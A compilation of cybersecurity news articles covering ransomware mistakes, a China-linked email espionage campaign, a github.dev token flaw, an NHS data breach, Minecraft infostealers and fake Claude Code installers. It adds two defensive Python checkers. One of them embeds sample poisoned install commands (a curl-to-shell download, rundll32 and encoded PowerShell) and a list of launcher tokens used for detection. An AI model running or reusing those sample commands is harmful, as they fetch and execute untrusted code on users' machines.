
Ransomware Gang Apologizes After Mistakenly Attacking CIS Company and Revealing Criminal Errors


Surprisingly, even cybercriminal collectives slip up sometimes, a fact highlighted when attackers struck a business inside a CIS country. A misstep by Nova, tied to the RAlord network, led to unintended consequences. After an accidental hit on Eriell Group, an oilfield services leader based in Tashkent with operations extending into Russia, the affiliates backtracked publicly. The group formally expressed regret over targeting such a firm, but the apology came only after its internal protocols appeared to have been breached. Mistaken identity seems to have triggered the reversal, and trust among criminal actors likely took a quiet blow.

Reports indicate that after Eriell reached out to Nova to alert it to the mistake, the link between the operator and the group was cut. The individual involved was banned soon afterward and lost access entirely. Instead of resistance came an apology, structured and deliberate, followed by assistance offered freely and framed as support rather than restitution. The group's stance: encryption never happened, the data remains unpublished, and its intent is unclear but outwardly cooperative. Still, the unwritten code among major ransomware groups holds: steer clear of Russian and broader CIS networks.

Even though hacking violates local laws there, officials routinely ignore profit-driven breaches as long as they spare homegrown entities. Some hacking collectives, such as DragonForce, VanHelsing, and LockBit, ban strikes on Russian-linked targets. Despite that, the Nova member tied to the Eriell breach probably won't quickly earn trust among peers again. Though rules exist, breaking unwritten loyalties carries consequences few overlook. It has happened before: threat actors stumbling through avoidable errors.

In one such case, a ransom-driven team called Scattered Lapsus$ Hunters announced full control over Resecurity, a firm focused on digital defense, boasting that they had extracted every piece of stored information. In reality, their intrusion led straight into a trap set long in advance: a decoy system designed to mislead. That slip gave authorities what they needed, not just to track one participant but to secure legal grounds to pursue evidence further.

In another case, attention turned to CyberVolk, a pro-Russian hacktivist collective that rolled out ransomware yet embedded the primary decryption keys directly within the code. Because of this oversight, those affected found a way to unlock their data freely, bypassing any payment. Mistakes like these undermined the entire scheme before it gained traction. Wrong moves in coding sometimes backfire.

The team behind Sicarii built a system that generated fresh encryption keys on each launch, yet wiped the matching private key right afterward. Because of this, victims had no way to unlock their data, payment or not. In another case, Nitrogen's tool failed due to a nearly identical error, leaving its decryption method useless. Paying up became meaningless when recovery was impossible by design. Such missteps reveal a different side: those behind cyberattacks aren't flawless.

Though often seen as highly skilled, people running ransomware schemes act mainly for money; yet just like others, they slip up, leaving openings that can unexpectedly help those targeted.

China-Linked Cyber Espionage Group Secretly Harvested Research and Defense Emails from North American Institutions


A sophisticated cyber espionage campaign linked to China infiltrated research, healthcare, academic, and military organizations across North America, remaining undetected for more than a year while stealing sensitive information and defense-related communications.

According to a recent report from Google’s Threat Intelligence Group (GTIG), the campaign has been attributed with high confidence to a threat cluster identified as UNC6508. The attackers gained access through compromised REDCap (Research Electronic Data Capture) servers and later leveraged built-in Google Workspace features to quietly collect targeted emails.

The threat actor and its custom malware, known as INFINITERED, were previously highlighted by Google in February during a broader assessment of state-sponsored attacks targeting the defense industry. While the affected organizations were not publicly named, the victims reportedly included healthcare providers, universities, military medical institutions, advocacy organizations, and regulatory agencies in the United States and Canada. Google stated that it alerted impacted entities and took action against the attackers’ infrastructure.

The attackers targeted externally accessible REDCap servers, a widely used platform that helps hospitals, research institutions, and universities manage study data and databases.

Although Google has not identified the precise method used to gain initial access, nor linked the activity to a specific vulnerability or CVE, investigators observed the group scanning older REDCap versions known to contain security weaknesses.

Roughly three months after breaching the servers, UNC6508 deployed INFINITERED, a customized malware strain designed to modify REDCap system files. The malware ensured long-term persistence by embedding itself into the platform’s update process, allowing malicious code to survive future software upgrades.

INFINITERED also captured usernames and passwords entered through REDCap login portals and stored the stolen credentials in encrypted form within local databases. Additionally, the malware functioned as a backdoor, accepting commands through HTTP cookies and executing them whenever users loaded web pages.

Researchers traced the earliest known compromise to September 2023, with malicious activity continuing through November 2025. After establishing a foothold, the attackers conducted network reconnaissance, collected database and service account credentials, and eventually escalated privileges to obtain domain administrator access.

Rather than deploying a separate data-exfiltration tool, the attackers exploited an existing Google Workspace administrative capability known as content compliance rules.

These rules are typically used by organizations to monitor emails for specific keywords and automatically apply actions such as forwarding or copying messages. UNC6508 created a malicious rule named "Patroit" that monitored nearly 150 keywords, email addresses, and search terms associated with its intelligence-gathering objectives.

Whenever an email matched the predefined criteria, Google Workspace automatically sent a hidden copy to an attacker-controlled Gmail account. Google has since disabled the account involved in the operation.

This technique allowed the threat actors to collect sensitive communications without installing malware on mail servers or generating suspicious network traffic. Instead, they relied entirely on legitimate cloud-based functionality to siphon information.

While email-forwarding rule abuse is already recognized within the MITRE ATT&CK framework, GTIG noted that using domain-level content compliance rules for espionage represented a previously unseen tactic among China-linked cyber actors.

Analysis of the monitoring rules revealed that UNC6508 was particularly interested in subjects related to geopolitical strategy, military technologies and equipment, artificial intelligence, autonomous and uncrewed systems, offensive cyber operations, and medical research.

One especially notable keyword was "chikungunya," a mosquito-borne disease linked to a significant outbreak in China's Guangdong province during 2025, suggesting the group's collection interests extended into public health and epidemiological research.

Security teams are advised to immediately update internet-facing REDCap servers and completely remove outdated software versions. Because REDCap allows multiple versions to operate simultaneously, legacy installations can create opportunities for downgrade attacks that exploit known vulnerabilities.

Organizations should also review Google Workspace and other cloud email environments for unusual content compliance rules, unauthorized mail forwarding settings, and external BCC destinations. Administrative audit logs should be examined to identify when rule changes occurred and who made them.
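The review step above, as an added example that is not GTIG's or Google's tooling: it takes an exported list of mail rules and admin audit events in a constructed, simplified format (not the Admin SDK schema), flags rules that copy mail to addresses outside the organization's domains or that match an unusually large term list, and joins each flagged rule with the actor and time that created it. The domains, addresses, thresholds and record layout are assumptions.

```python
"""Audit content-compliance / routing rules for external copy destinations.

Added example, not from the GTIG report. The rule and audit-event layouts
below are CONSTRUCTED simplifications of what an admin export might contain.
"""

ORG_DOMAINS = {"example-hospital.org", "mail.example-hospital.org"}  # assumed org domains
MAX_REASONABLE_TERMS = 50  # a rule matching ~150 terms, as in the report, is an outlier

# Constructed sample: one benign DLP rule and one modelled on the "Patroit" rule.
SAMPLE_RULES = [
    {"name": "DLP-SSN-quarantine", "match_terms": ["SSN", "social security"],
     "actions": [{"type": "quarantine"}]},
    {"name": "Patroit", "match_terms": [f"term{i}" for i in range(150)],
     "actions": [{"type": "add_bcc", "recipient": "collector.example@gmail.com"}]},
]

# Constructed admin audit events recording who created each rule and when.
SAMPLE_AUDIT_EVENTS = [
    {"time": "2024-03-02T04:13:00Z", "actor": "it-admin@example-hospital.org",
     "event": "CREATE_GMAIL_SETTING", "setting": "Content compliance", "rule": "Patroit"},
    {"time": "2023-11-10T15:00:00Z", "actor": "dlp-admin@example-hospital.org",
     "event": "CREATE_GMAIL_SETTING", "setting": "Content compliance",
     "rule": "DLP-SSN-quarantine"},
]

COPY_ACTIONS = {"add_bcc", "forward", "add_recipient"}  # assumed action names


def is_external(address, org_domains=ORG_DOMAINS):
    """True when the address's domain is not one of the organization's own."""
    return address.rsplit("@", 1)[-1].lower() not in org_domains


def rule_findings(rule, org_domains=ORG_DOMAINS):
    """Return human-readable reasons a rule deserves review (empty if none)."""
    findings = []
    for action in rule.get("actions", []):
        if action.get("type") in COPY_ACTIONS:
            rcpt = action.get("recipient", "")
            if is_external(rcpt, org_domains):
                findings.append(f"copies mail to external address {rcpt}")
    n_terms = len(rule.get("match_terms", []))
    if n_terms > MAX_REASONABLE_TERMS:
        findings.append(f"matches {n_terms} terms")
    return findings


def audit_rules(rules, events, org_domains=ORG_DOMAINS):
    """Map each suspicious rule name to its findings plus creator and time."""
    created = {e["rule"]: e for e in events if "rule" in e}
    report = {}
    for rule in rules:
        findings = rule_findings(rule, org_domains)
        if findings:
            ev = created.get(rule["name"])
            report[rule["name"]] = {
                "findings": findings,
                "created_by": ev["actor"] if ev else None,
                "created_at": ev["time"] if ev else None,
            }
    return report


if __name__ == "__main__":
    for name, info in audit_rules(SAMPLE_RULES, SAMPLE_AUDIT_EVENTS).items():
        print(name, info)
```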

Google has also published indicators of compromise associated with INFINITERED, which defenders can use to search for signs of intrusion within their environments. Implementing phishing-resistant multi-factor authentication (MFA) for administrator accounts is another critical step, as the email theft operation ultimately depended on obtaining elevated administrative privileges.

Although investigators have not yet determined exactly how UNC6508 initially compromised the REDCap servers, the campaign demonstrates how legitimate cloud administration features can be weaponized once attackers gain sufficient access. As a result, organizations must monitor not only malware and network activity but also the misuse of trusted enterprise tools that can quietly facilitate data theft.

Researcher Reveals VS Code Flaw That Could Expose GitHub Access Tokens Through a Single Click

A publicly disclosed security flaw affecting the browser-based version of Visual Studio Code has drawn attention from developers after a researcher demonstrated how attackers could potentially obtain GitHub authentication tokens through a single user interaction.

The issue was disclosed by security researcher Ammar Askar, who published technical details alongside proof-of-concept code showing how the vulnerability could be abused. At the time of disclosure, no CVE identifier had been assigned and Microsoft had not released an official software patch.

According to Askar's analysis, the weakness exists within github.dev, GitHub's web-based development environment that allows users to work with repositories directly from a browser using technology derived from Visual Studio Code. The attack takes advantage of the way VS Code's webview components communicate with the main editor environment.

Webviews are embedded browser windows used by extensions and web applications to display interactive content. While these components are designed to operate within restricted environments, the researcher found a method to abuse the message-passing mechanism that connects a webview to the editor interface.

The published demonstration shows how malicious JavaScript running inside a webview can trigger actions within the main editor window. By simulating keyboard input and user activity, the code can install a malicious extension without requiring the victim to manually perform the installation process.

Once deployed, the extension is capable of extracting a GitHub OAuth token that is transmitted when users access github.dev. OAuth tokens act as authorization credentials that allow applications to interact with GitHub services on behalf of authenticated users.

According to the researcher, the security concern extends beyond access to a single repository. The token passed to github.dev can inherit the permissions associated with the user's GitHub account, potentially granting access to every repository available to that account, including private projects.

Using the proof-of-concept attack, a malicious extension can retrieve the token and communicate with GitHub's API. This allows an attacker to identify repositories accessible to the compromised account and gather information about private development resources.

Askar argued that the broad permissions associated with the token significantly increase the potential impact of exploitation because access is not limited to the repository that initially triggered the github.dev session.

To reduce exposure while no official fix was available, the researcher advised users to clear cookies and locally stored site data associated with github.dev. Removing this stored data forces additional authentication checks that can help expose suspicious sign-in attempts.

After clearing the stored information, users attempting to access github.dev through a malicious link would be more likely to encounter a warning indicating that the GitHub Repositories extension is requesting authorization through GitHub. Such prompts can serve as an indication that unexpected account access is being requested.

The disclosure also highlighted ongoing tensions surrounding vulnerability reporting processes. Askar stated that GitHub was notified approximately one hour before publication of the research. He described the disclosure as a deliberate decision to release the information publicly rather than pursue a lengthy coordinated disclosure process.

The researcher cited previous interactions involving another VS Code vulnerability that he reported through Microsoft's security channels. According to his account, the issue was later addressed without attribution and was classified as having no security impact despite his concerns regarding its implications.

Askar said that experience influenced his decision to publicly disclose future VS Code security findings rather than continue working through Microsoft's reporting process.

The incident follows several other public disclosures involving Microsoft products by an independent researcher operating under the online alias "Nightmare Eclipse." Over recent months, that researcher has released details regarding multiple unpatched vulnerabilities affecting Windows and related Microsoft technologies, including flaws known as BlueHammer, RedSun, GreenPlasma, MiniPlasma, YellowKey, and UnDefend.

Some of those vulnerabilities were later reported as being actively exploited, further intensifying discussions within the security community about vulnerability handling, disclosure timelines, and communication between vendors and independent researchers.

Microsoft previously responded to some of those disclosures by warning that legal action could be considered when individuals engage in activities that cause harm to customers. The company also stated that it may cooperate with law enforcement agencies when necessary.

In comments provided following the publication of the VS Code findings, Microsoft emphasized the role independent researchers play in improving product security. The company stated that it remains committed to evaluating reported issues, coordinating engineering responses, and delivering mitigations intended to protect customers.

A subsequent statement from Microsoft indicated that the issue had been mitigated within its services and that users were not required to take additional action.

Developer-focused platforms remain attractive targets because authentication tokens can provide access to source code repositories, development environments, and organizational assets. Security teams generally recommend reviewing unexpected links carefully, limiting unnecessary permissions, monitoring account activity, and using strong authentication controls to reduce the likelihood of unauthorized access.

Healthcare Cyber Breach Raises Concerns After 33,000 Patients Affected

Initially perceived as a supply-chain disruption within the UK healthcare ecosystem, the ransomware attack has now revealed an even more severe and long-lasting impact on patient privacy. A cybercriminal attack on pathology services provider Synnovis two years ago has caused Bedfordshire Hospitals NHS Foundation Trust to confirm that sensitive data related to over 33,000 individuals has been stolen and published. 

The exposed records come from administrative pathology files associated with laboratory and diagnostic testing conducted between 2011 and 2020, and may contain personal information and clinical test results. 

Although ransomware incidents have long been associated with operational disruption, they also present long-term data protection challenges for healthcare organizations, and attacks on critical third-party suppliers supporting essential NHS services pose cascading risks. Following the June 2024 ransomware incident, Synnovis and the relevant healthcare organizations conducted an extensive forensic review to determine the extent of the exposure.

Bedfordshire Hospitals Foundation Trust informed the affected individuals after receiving confirmation that data associated with approximately 32,927 patients had been identified in material exfiltrated by the attackers and distributed on dark web sites. According to the trust, the delayed disclosure was driven primarily by the complexity of the investigation rather than by a newly discovered breach. The compromised dataset consisted of fragmented administrative records dispersed across several sources rather than conventional datasets stored in structured repositories, and more than a year of specialist analysis was required to determine the contents and organizational ownership of these files.

According to the review, historical pathology-related information spanning nearly a decade before November 2020 may have been exposed, including patient names, dates of birth, NHS and patient identification numbers, postcodes, and diagnostic test results. Researchers find cyber incidents involving unstructured healthcare data difficult to assess because the stolen information must be accurately mapped before the full impact on affected individuals can be understood. Once notifications had been sent to the affected individuals, the focus shifted from forensic reconstruction to risk mitigation.

Bedfordshire Hospitals Foundation Trust urged patients to remain vigilant for suspicious communications, advising them not to respond to unexpected requests for personal information, to avoid opening attachments or links from sources that are unfamiliar, and to be cautious when receiving unsolicited phone calls, emails, or text messages that reference healthcare information. 

It is acknowledged that disclosures of such information may cause concern; however, the trust emphasised that the compromise resulted from an external pathology supplier's systems rather than its own network infrastructure, reiterating its commitment to supplier oversight and data protection governance. Cybersecurity professionals, on the other hand, have criticised the delay in disclosure.

Saif Abed, founding partner of the AbedGraham Group, has argued that a two-year gap between the incident and patient notification raises serious questions about the accountability of all organizations involved in the attack. He also challenged suggestions that the fragmented nature of the stolen records significantly reduces risk; in his view, modern threat actors are equipped to aggregate, analyse, and correlate disparate datasets with increasing ease.

In Abed's opinion, once healthcare data enters criminal ecosystems it is more likely to be misused than at the time of the original breach, leaving affected individuals with limited recourse and raising concerns about whether systemic lessons from the Synnovis incident have been adequately addressed. These concerns echo his call last year for a formal public inquiry into the ransomware attack, which centred on third-party cyber risk, breach transparency, and the resilience of critical healthcare supply chains. Even after disrupted systems are restored and headlines fade, the consequences of cyberattacks often persist.

Healthcare organizations must maintain cyber resilience across complex networks of third-party providers, where visibility into supply chain security, timely breach assessment, and transparent communication remain critical. As this case shows, patients need to remain vigilant against phishing attempts and identity-based fraud, while healthcare leaders need to reinforce continuous monitoring of external partners that handle sensitive information.

This incident demonstrates that maintaining patient trust throughout the healthcare ecosystem involves much more than simply adhering to technical requirements.

WeedHack Malware Infects Over 116,000 Minecraft Players Through Fake Mods and Cheats


Early this year, a large-scale campaign named WeedHack began spreading, tricking more than 116,000 Minecraft players worldwide. What seemed like useful mods carried hidden malicious software rather than harmless add-ons. Victims often found these files through deceptive video guides or manipulated web search results promising better performance. Once installed, the malware quietly pulled usernames, passwords, and crypto wallets from infected devices.

Though warnings have been issued, experts confirm the operation is still active and steadily expanding its reach. According to McAfee, over 116,000 devices now show signs of intrusion by WeedHack, with between two thousand and three thousand fresh infections daily. The United States, Germany, India, and the United Kingdom account for most affected users. Analysis revealed a network built on over 240 harmful web links, and close to 3,820 distinct JAR files were tied directly to distribution efforts.

YouTube, alongside skewed search results, dominates how users encounter these threats. Harmful links promoting counterfeit Minecraft modifications hide inside video descriptions or comment sections. Appearances deceive: some productions include polished narration and real-looking game scenes, and their apparent legitimacy grows as large audiences watch, boosting visibility for players seeking add-ons. Not stopping there, attackers also manipulate how search results appear.

When someone looks up reliable software such as Meteor Client or Radium Client, fraudulent pages rise to the top. Because genuine modifications often live solely on GitHub without a dedicated website, fraudsters take advantage of that gap. Looking nearly identical to authentic sources, these imitation sites blur the line between safe and risky choices.

Surprisingly, McAfee spotted a harmful website displaying alerts about counterfeit Skytils downloads while also linking to the authentic GitHub and Discord sources. Even though the layout seemed reliable, visitors were handed corrupted files without their knowledge and ended up running malicious software, misled by the site's convincing appearance. Unlike most infostealers, WeedHack operates in plain sight, offering its tools via a malware-for-hire model.

Its control panel gives operators access to compromised systems, where data taken from victims appears sorted and readable. From that interface, new malicious installer files can be built targeting Minecraft versions 1.21.0 through 1.21.10. Stolen details include Minecraft session tokens, saved browser passwords, and active cookies, and it also harvests Discord, Steam, and Telegram logins.

Cryptocurrency wallet data is pulled silently too, and screenshots captured behind the user's back round out the basic feature set. For five dollars monthly or twenty-five dollars one-time, the enhanced tier unlocks remote desktop viewing, webcam operation, continuous keystroke recording, control over the victim's command line, and remote file management.

Studies indicate that over eight hundred members are part of WeedHack's Telegram community. Though some seem underage, a number use its online interface to target others or access personal data. Most security specialists suggest obtaining mods solely from verified platforms and checking URLs thoroughly, while skipping any JARs hosted on shady domains. For add-ons with fewer risks, Minecraft's built-in marketplace tends to be the safest path available.

Hackers Exploit Fake Claude Code Installers and Install Malware

Developers looking for Claude Code deployment instructions could be lured into an advanced malware campaign that disguises itself as genuine AI tooling documentation.

Fake Claude code exploit

Researchers found several fake Claude Code and developer platform websites built to steal credentials, cryptocurrency, and API keys.

According to Straiker researchers' analysis of the campaign, “the attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt. You copy a command. You paste it in your terminal. By then, it’s already too late.”

Highlights of the fake Claude Code campaign

1. Researchers found over 88 fake domains mimicking Claude Code and other developer sites. The campaign uses SEO poisoning and Google ads to rank malicious install pages above genuine documentation.

2. Threat actors hide malicious commands within genuine installation commands without impacting the deployment process.

3. The malware particularly targets AI-related assets such as cloud development credentials, API keys, and authentication tokens.

About the credential theft campaign

The campaign targeted users of popular AI and developer tools such as Claude Code, JetBrains, Perplexity Comet, and Cline.

According to the researchers, the operation relies on over 88 domains hosted across legitimate platforms and constantly shuffles its infrastructure, letting malicious sites resurface immediately after takedowns. To trap targets, the threat actors use redirect chains, SEO poisoning, and paid Google ads that place fraudulent install pages above genuine documentation in search results.

These websites closely impersonate genuine vendor resources and display installation commands that look legitimate but include hidden separators, such as “&”, that launch malicious actions alongside the expected software deployment.

In many incidents, the genuine command still completes successfully, which helps conceal the compromise.

Delivery of malware and launch tactics

Researchers observed multiple delivery techniques, including rundll32.exe loading malicious DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts.

These techniques improve the attackers' chances of evading conventional detection tools. Unlike typical infostealers, the campaign targets AI-related assets such as authentication tokens, API keys, and cloud development credentials from tools like Continue[.]dev and Cline.

After execution, the malware uses a multi-stage malicious chain featuring encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.

Researchers identified the primary payload as ACRStealer, an information-stealing malware family that has evolved to include sophisticated encryption and evasion tactics. They also identified a cryptocurrency clipboard hijacker that redirects transactions by replacing copied wallet addresses.
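A pre-paste check for the pattern described above (a legitimate install command with a second command spliced in behind a separator, and the rundll32/mshta/encoded-command launchers named in the delivery section), as an added example that is not Straiker's tooling. The host allowlist, launcher token list and sample commands are constructed assumptions; it is a linter for copied one-liners, not a sandbox.

```python
"""Flag install one-liners that chain a hidden command behind a legitimate one.

Added example, not Straiker's tooling. Heuristics are assumptions drawn from
the campaign description: extra commands behind shell/cmd separators,
rundll32/mshta/encoded-command launchers, downloads from hosts outside an
allowlist, and invisible characters. Run it on a command BEFORE pasting it.
"""
import re
from urllib.parse import urlparse

# Assumed allowlist; a real deployment would use the organization's approved sources.
TRUSTED_HOSTS = {"github.com", "raw.githubusercontent.com", "registry.npmjs.org"}

# Launchers/decoders named in the campaign description plus common variants (assumption).
LAUNCHER_TOKENS = ("rundll32", "mshta", "-encodedcommand", "-enc ", "frombase64string",
                   "certutil", "invoke-expression", " iex", "base64 -d", "base64 --decode")

# '&' is deliberately excluded from the URL class so 'url&cmd' splits as a chain;
# query-string fragments such as 'b=2' are filtered out again in split_chain().
URL_RE = re.compile(r"https?://[^\s'\"<>|;&]+")
SEPARATOR_RE = re.compile(r"\|\||&&|\||&|;|\r?\n")
ASSIGNMENT_RE = re.compile(r"^[\w.-]+=\S*$")
INVISIBLE_RE = re.compile("[\u200b-\u200f\u2028-\u202e\u2060\ufeff]")


def split_chain(cmd):
    """Return the commands chained by separators, with URLs masked as <url>."""
    masked = URL_RE.sub("<url>", cmd)
    parts = [p.strip() for p in SEPARATOR_RE.split(masked)]
    return [p for p in parts if p and not ASSIGNMENT_RE.match(p)]


def check_install_command(cmd):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    if INVISIBLE_RE.search(cmd):
        findings.append("contains invisible Unicode characters")
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host not in TRUSTED_HOSTS:
            findings.append(f"downloads from untrusted host {host}")
    lowered = cmd.lower()
    for token in LAUNCHER_TOKENS:
        if token in lowered:
            findings.append(f"uses launcher/decoder token {token.strip()!r}")
    chain = split_chain(cmd)
    if len(chain) > 1:
        findings.append("chained commands after the first: " + " ; ".join(chain[1:]))
    return findings


def is_safe_to_paste(cmd):
    return not check_install_command(cmd)


# Constructed samples: a clean command and two modelled on the campaign's pattern
# (the package name, host and DLL path are placeholders, not real artifacts).
BENIGN = "npm install -g example-cli"
POISONED_WIN = 'npm install -g example-cli & rundll32 "%TEMP%\\up.dll",Run'
POISONED_SH = ("curl -fsSL https://installer-mirror.example/setup.sh | sh; "
               "powershell -enc AAAA")

if __name__ == "__main__":
    for sample in (BENIGN, POISONED_WIN, POISONED_SH):
        print(sample, "->", check_install_command(sample) or "ok")
```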
